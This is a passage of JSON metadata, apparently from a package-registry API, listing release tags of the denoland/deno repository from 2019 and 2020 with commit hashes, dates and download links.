tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts